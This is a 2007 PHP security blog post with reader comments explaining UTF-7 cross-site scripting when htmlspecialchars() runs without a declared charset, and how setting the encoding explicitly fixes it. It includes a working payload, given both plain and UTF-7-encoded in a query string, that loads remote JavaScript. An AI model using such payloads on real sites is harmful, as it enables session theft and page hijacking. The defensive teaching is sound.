About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


Character Encoding and XSS

While lamenting Ronaldinho's red card and writing an overdue column for php|architect this weekend, I took a break to read Kevin Yank's latest post, Good and Bad PHP Code.

In the post, he provides a few useful PHP interview questions, including some questions from Yahoo as well as his personal favorite:

In your mind, what are the differences between good PHP code and bad PHP code?

He explains that good PHP code should be:

  • Structured
  • Consistent
  • Portable
  • Secure

He also takes an example of bad PHP code and makes it better, producing this:

<?php
 
if (isset($_GET['query'])) {
    echo '<p>Search results for query: ',
         htmlspecialchars($_GET['query'], ENT_QUOTES),
         '.</p>';
}
 
?>

In the comments, many additional improvements have been suggested, but there's one that has yet to be mentioned. When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible. If you've been reading my blog for a while, you can probably put the pieces together yourself, so feel free to give it a go. The only obstacle is the fact that ENT_QUOTES causes all quotes to be escaped, and quotes are consistent between UTF-7 and ISO-8859-1, so you need an example exploit that doesn't use them:

<script src=http://shiflett.org/xss.js>

Web standards pedants might cringe, but this works in most browsers, despite the missing quotes, and the JavaScript returned by xss.js executes within the context of the current page.

To try this out, just save the example PHP code somewhere, then visit it with your browser, including the following value in the query string:

?query=%2BADw-script+src%2BAD0-http%3A%2F%2Fshiflett.org%2Fxss.js%2BAD4-

This only works in browsers that automatically detect the character encoding, but you can mimic the situation by manually setting your browser to use UTF-7 or by sending a Content-Type header that does the same thing:

<?php
 
header('Content-Type: text/html; charset=UTF-7');
 
?>

About this post

Character Encoding and XSS was posted on Tue, 29 May 2007. If you liked it, follow me on Twitter or share:

15 comments

1.Philip Olson said:

Can you provide a simple example that improves upon that $_GET['query'] example above? One that works on typical PHP 4 and PHP 5 installations. If not, what do you suggest... ext/filter?

Wed, 30 May 2007 at 03:23:38 GMT Link


2.Christian Matthies said:

Philip, the only thing developers tend to forget about is to specify the character encoding when using htmlspecialchars(). Due to that mistake, UTF-7 attack vectors become possible. Thats what Chris tried to point out.

So just use that function with it's third argument (eg. iso-8859-1) and feel safe.

Wed, 30 May 2007 at 07:41:54 GMT Link


3.Concerned Citizen said:

Chris, your wording is a little ambiguous, and it sounds like you may have thrown Christian off.

When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible.

In that sentence, "specifying the character encoding" refers to the Content-Type header, not (just) the third parameter to htmlentities/specialchars. For example, working from an example from one of the previous posts about the UTF-7 issue:

<?php
 
$string = "<script>alert('XSS');</script>";
 
$string = mb_convert_encoding($string, 'UTF-7');
 
// this:
 
echo htmlentities($string);
 
// is just as vulnerable as this:
 
echo htmlentities($string, ENT_COMPAT, 'UTF-8');
 
?>

In that specific case, ENT_QUOTES would save you because there are single quotes in the javascript (you'd get a javascript parse error instead of a working exploit), but you'd still have a XSS hole.

What saves you from all these UTF-7 holes (correct me if I'm wrong) is specifying a charset in the Content-Type header, i.e. put this at the top:

<?php
 
header('Content-Type: text/html; charset=UTF-8');
 
// this would work, too:
 
// header('Content-Type: text/html; charset=ISO-8859-1');
 
?>

and you don't need to worry about UTF-7 XSS any more (it'll just show up as garbage).

I'll even go out on a limb and say that the third argument to htmlentities is irrelevant to XSS if you're specifying a charset properly (and that charset isn't UTF-7 or another one where the relevant special characters differ from ASCII; are there any others?).

As a matter of fact, I also can't think of a situation where ENT_QUOTES is necessary, as long as you're putting double quotes around all your html attributes (which you should be) and you're not doing anything silly like:

<?php
 
echo "<a ".htmlentities($_GET['something']).">foo</a>";
 
?>

i.e. inserting user input into a tag but outside of a (properly double-quoted) attribute, which seems odd and is something I've never wanted or needed to do.

So if I were hiring a php developer, I wouldn't concern myself with how they use htmlentities/specialchars, as long as they were using it.

Wed, 30 May 2007 at 09:38:37 GMT Link


4.Concerned Citizen said:

To clarify, my (unproven) assertion is that the charset parameter to htmlentities is irrelevant to security/XSS. On the other hand, there may be encodings where running htmlentities in the default mode would mangle the string. (I don't think UTF-8 is one of these encodings, since in UTF-8 all the bytes in the non-ASCII characters have the high bit set whereas the dangerous characters are single-byte with the high bit off. Which makes me wonder what specifying UTF-8 for the charset in a call to htmlspecialchars actually does...)

Anyway, what I'm saying is that the charset parameter is an i18n tool, not a security tool. That's my assertion, anyway.

Wed, 30 May 2007 at 10:15:41 GMT Link


5.Christian Matthies said:

Right, I've mixed that up. Forget what I said earlier.

Wed, 30 May 2007 at 10:59:45 GMT Link


6.Edward Yang said:

It's a bit scary to see the misinformation prevalent about what htmlspecialchars() and htmlentities() do, although I don't blame you guys. Concerned Citizen is right: in some research I did previously, I established that the character encoding parameter in these functions does not actually fix up the character encoding of the string.

But here's the kicker: this behavior is mostly benign, since the usual exploits are extremely difficult to pull off (Chris Shiflett doesn't believe in the seriousness of it). I, personally, balk because it's extremely unclean: your application will not do anything about form feeds, or null bytes, or any of those icky control characters, and they will get passed back to the browser. This is the price you pay for a string format that by default is binary-compatible.

There's no cross-compatible, built-in way to fix this. The typical approach, however, is to use iconv when it is present and roll your own UTF-8 cleaner it isn't.

Wed, 30 May 2007 at 11:43:52 GMT Link


7.Tomek said:

Didn't quite have time to get much into the content of the article but you have made a mistake in the url about Ronaldinho's red card - you must put 'www' before fcbarcelona.com

And BTW - this red card was well deserved and it's a scandal that they've lowered a punishment :P

Wed, 30 May 2007 at 11:44:53 GMT Link


8.Chris Shiflett said:

Can you provide a simple example that improves upon that $_GET['query'] example above?

Focusing on the issue at hand, you can be sure the character encodings match by being explicit:

<?php
 
header('Content-Type: text/html; charset=UTF-8');
 
echo htmlentities($_GET['query'], ENT_QUOTES, 'UTF-8'); 
 
?>

In that sentence, "specifying the character encoding" refers to the Content-Type header, not (just) the third parameter to htmlentities/specialchars.

Exactly. In fact, I meant both.

Because both htmlentities() and htmlspecialchars() use ISO-8859-1 by default, you could just make sure that the Content-Type header indicates ISO-8859-1, but I think it's a good habit to be explicit.

Chris Shiflett doesn't believe in the seriousness of it.

Putting words in my mouth? :-)

That's not what I said, and all I meant was that it's difficult to appreciate the problem (IE 6's mishandling of character encoding) when the examples are so contrived.

Your example is pretty clear, and your follow-up response helps clarify the issue further:

The multibyte character issue requires that there already are tags on the page, and that some user-input is being put into the attributes of the tags.

Wed, 30 May 2007 at 12:20:41 GMT Link


9.Edward Yang said:

Putting words in my mouth? :-)

My apologies. That was the vibe I got from your last post on that thread. And I know another programmer who I greatly respect who stated that I shouldn't worry too much about the advisory.

Because both htmlentities() and htmlspecialchars() use ISO-8859-1 by default, you could just make sure that the Content-Type header indicates ISO-8859-1, but I think it's a good habit to be explicit.

I think a programmer should have wrapper functions for these two functions, so that they can easily change the encoding globally if need be.

Wed, 30 May 2007 at 21:42:26 GMT Link


10.Jon Tan said:

Web standards pedants might cringe, but this works in most browsers

:) Chris, invading my stats with the link text, 'Web standards pedants' is the highest compliment I've had all week *tear*. Hehe.

When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible.

Are there any implications in having the character encoding explicitly set to UTF-8? Also, if the question is elementary, can I cite being a webappsec-impaired designer in mitigation?

Thu, 31 May 2007 at 08:41:08 GMT Link


11.Kanedaaa said:

It dosnt work on Opera 9.20 on Linux but works with Firefox 1.5.0.10 (on Linux)

Fri, 01 Jun 2007 at 11:39:15 GMT Link


12.Ronald van den Heetkamp said:

Many programmers forget about encoding, so did he. It shows again that not many programmers are aware of the security risks that might emerge. Excellent example, It's good to point this out again Chris!

http://www.0x000000.com

Sun, 03 Jun 2007 at 17:02:42 GMT Link


13.Ben Ramsey said:

To explicitly set the charset in your Content-Type header for all PHP pages, make sure the following is set in your php.ini file:

default_charset = "UTF-8"

... or whatever character set you wish to use. This will eliminate the need to set a header() from your application, and it will ensure that the Content-Type headers sent look something like this:

Content-Type: text/html; charset=UTF-8

Are there any implications in having the character encoding explicitly set to UTF-8? Also, if the question is elementary, can I cite being a webappsec-impaired designer in mitigation?

Not an elementary question. I think sometimes the use of UTF-8 confuses people into thinking it's being used as a security measure. The use of UTF-8 isn't for security purposes. You could just as well set your charset to ISO-8859-1. The point from a security standpoint is to escape your output in the same encoding in which your pages are being sent to the client. This means that you should explicitly set the charset in the Content-Type header and specify the same charset in htmlentities()/htmlspecialchars().

Using UTF-8 as your charset simply means you can support the display of multibyte characters in the content you send to the browser. If your charset is set to ISO-8859-1, for example, and you try to send a unicode character to the browser, it will render funny.

Wed, 13 Jun 2007 at 02:10:35 GMT Link


14.Jon Tan said:

...you should explicitly set the charset in the Content-Type header and specify the same charset in htmlentities()/htmlspecialchars().

Thanks Ben. Display of multibyte characters or the possibility of that being required is exactly why I always set UTF-8 by default. In fact until I read this article from Chris I wasn't aware of any other implications. It would feel less than thorough to not be explicit and it's good to know that being explicit is useful regarding XSS too.

Sat, 16 Jun 2007 at 13:59:18 GMT Link


15.Ludko said:

In that specific case, ENT_QUOTES would save you because there are single quotes in the javascript (you'd get a javascript parse error instead of a working exploit), but you'd still have a XSS hole.

This would not help prevent runningu XSS. There is no need to have quotes in js to be able to exploit xss.

<script src=http://shiflett.org/xss.js>

Sat, 08 Dec 2007 at 16:32:57 GMT Link


Hello! What’s your name?

Want to comment? Please connect with Twitter to join the discussion.